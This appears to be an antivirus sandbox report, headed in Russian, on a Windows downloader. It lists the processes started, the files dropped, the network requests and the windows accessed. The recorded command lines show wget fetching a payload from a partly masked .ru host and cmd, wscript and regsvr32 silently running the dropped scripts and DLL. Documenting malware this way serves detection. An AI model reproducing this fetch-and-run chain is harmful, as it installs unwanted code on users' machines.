Техническая информация
- '<SYSTEM32>\start4.exe'
- 'C:\turbobit\wget\wget.exe' -P C:\turbobit\wget\temp "http://lo###oney.ru/get_file?si##########################################################################################################################################"
- 'C:\turbobit\wget\on.exe'
- '<SYSTEM32>\cmd.exe' /c ""C:\turbobit\wget\temp\reg.bat" "
- '<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\AutoItX3.dll
- '<SYSTEM32>\wscript.exe' "C:\turbobit\wget\temp\start.vbs"
- '<SYSTEM32>\wscript.exe' "c:\turbobit\wget\wget_on.vbs"
- '<SYSTEM32>\cmd.exe' /c ""c:\turbobit\wget\wget.bat" "
- '<SYSTEM32>\wscript.exe' "C:\turbobit\wget\temp\reg.vbs"
- C:\turbobit\wget\temp\start.vbs
- C:\turbobit\wget\wget.bat
- C:\turbobit\wget\temp\reg.bat
- C:\turbobit\wget\temp\reg.vbs
- <SYSTEM32>\start4.exe
- C:\turbobit\wget\temp\get_file@sid=11481&url=aHR0cDovL3d3dy5pdGNvbS1udC5ydS9maWxlcy9zdWJ3YXlfc3VyZmVycy5leGU=&name=c3Vid2F5X3N1cmZlcnMuZXhl&type=c2V0dXA=&size=MjIyODMwNzI=
- C:\turbobit\wget\wget_on.vbs
- <SYSTEM32>\AutoItX3.dll
- C:\turbobit\wget\libiconv2.dll
- C:\turbobit\wget\libintl3.dll
- C:\turbobit\wget\AutoItX3.dll
- C:\turbobit\wget\libeay32.dll
- C:\turbobit\wget\start4.exe
- C:\turbobit\wget\wget.exe
- C:\turbobit\wget\libssl32.dll
- C:\turbobit\wget\on.exe
- 'lo###oney.ru':80
- lo###oney.ru/get_file?si##########################################################################################################################################
- DNS ASK lo###oney.ru
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''